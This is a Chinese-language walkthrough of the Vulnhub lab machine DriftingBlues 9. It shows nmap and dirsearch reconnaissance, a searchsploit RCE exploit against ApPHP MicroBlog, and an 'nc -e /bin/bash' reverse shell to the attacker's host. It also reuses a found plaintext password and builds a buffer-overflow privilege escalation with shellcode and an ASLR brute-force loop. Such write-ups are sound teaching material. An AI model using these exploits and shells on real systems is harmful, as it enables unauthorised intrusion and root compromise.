Vulnhub靶机:driftingblues 9

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:driftingblues9(10.0.2.24)

目标:获取靶机root权限和flag

靶机下载地址:http://www.vulnhub.com/entry/driftingblues-9-final,695/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.24

Vulnhub靶机:driftingblues 9_第1张图片

使用nmap端口扫描发现靶机开放端口:80、111

Vulnhub靶机:driftingblues 9_第2张图片

访问网站,发现该网站为pPHP MicroBlog搭建的

Vulnhub靶机:driftingblues 9_第3张图片

使用dirsearch工具进行目录爆破,发现/INSTALL.txt文件,访问可获得信息:ApPHP MicroBlog Free版本为: 1.0.1

Vulnhub靶机:driftingblues 9_第4张图片

Vulnhub靶机:driftingblues 9_第5张图片

三、漏洞利用

使用searchsploit查找该版本的cms是否有历史漏洞,发现远程代码执行漏洞

searchsploit apphp microblog         

Vulnhub靶机:driftingblues 9_第6张图片

将exp下载,运行,主机获取shell

searchsploit -m 33070.py
python2 33070.py http://10.0.2.24/index.php

Vulnhub靶机:driftingblues 9_第7张图片

反弹shell更加方便一点,使用nc反弹shell,并获取交互式shell

靶机:
nc -e /bin/bash 10.0.2.15 4444

攻击机:
nc -lvp 4444
python -c 'import pty; pty.spawn("/bin/bash")'

Vulnhub靶机:driftingblues 9_第8张图片

四、提权

使用sudo -l命令查看是否有特权命令,使用find / -perm -u=s -type f 2>/dev/null命令查看是否有什么可疑的具有root权限的文件,查看历史命令,查看计划任务…,都没有可利用的点

翻一翻靶机文件碰碰运气,发现在/home目录下存在clapton用户目录,没有权限访问

发现在/var/www/html/include目录下有个数据库文件,查看发现用户名密码:clapton\yaraklitepe

Vulnhub靶机:driftingblues 9_第9张图片
Vulnhub靶机:driftingblues 9_第10张图片

猜测该数据库密码为clapton用户的密码,尝试切换clapton用户su clapton,切换成功

Vulnhub靶机:driftingblues 9_第11张图片

访问/home/clapton的发现一个flag和提示信息

Vulnhub靶机:driftingblues 9_第12张图片

根据提示,打开网站,发现是讲解缓冲区溢出的文章,再根据当前路径下的input可执行文件,可以判断使用缓冲区溢出提权

  • https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
  • https://samsclass.info/127/proj/lbuf1.htm

Vulnhub靶机:driftingblues 9_第13张图片
Vulnhub靶机:driftingblues 9_第14张图片

额难办,没有半点pwn基础,参考网上的wp,边学边提权

首先将input程序移动到本机来(可以使用python在靶机搭建临时服务器),启动gdb使用cyclic工具(需要安装pwndbg插件)生成200个字符组成的字符串用于计算偏移量,为171

Vulnhub靶机:driftingblues 9_第15张图片
Vulnhub靶机:driftingblues 9_第16张图片
在这里插入图片描述

尝试在偏移量171溢出后情况,在溢出后的位置写入BBBB

r $(python -c 'print("A" * 171 + "B" * 4 )')

Vulnhub靶机:driftingblues 9_第17张图片

查看/proc/sys/kernel/randomize_va_space发现靶机开启了ASLR

ASLR(地址随机化)是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的。

在这里插入图片描述

在靶机查看ESP寄存器的值

x/s $esp

在这里插入图片描述

用esp 寄存器的 0xbf99cc60替换 4 个 B,因为是小字节序,倒过来写,构造 payload:

r $(python -c 'print("A" * 171 + "\x60\xcc\x99\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')

因为靶机开启了ASLR,Libc 随机化仅限于 8 位,所以写个循环爆破(不知道是不是这样,没理解清楚)

for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\x60\xcc\x99\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done

在这里插入图片描述
在这里插入图片描述

获取root目录下的flag

Vulnhub靶机:driftingblues 9_第18张图片

没有基础太难受了

参考链接:
缓冲区溢出利用——捕获eip的傻瓜式指南 - r00tgrok - 博客园 (cnblogs.com)

VulnHub-driftingblues:9_driftingblues9-CSDN博客

ASLR机制及绕过策略-栈相关漏洞libc基址泄露 - 简书 (jianshu.com)

nop sled 空操作雪橇 - 哼哼先生 - 博客园 (cnblogs.com)

红队渗透测试之Lord Of The Root——缓冲区溢出 - FreeBuf网络安全行业门户

Vulnhub 靶场 DRIFTINGBLUES: 9 (FINAL) - sainet - 博客园 (cnblogs.com)

你可能感兴趣的:(靶场,web安全)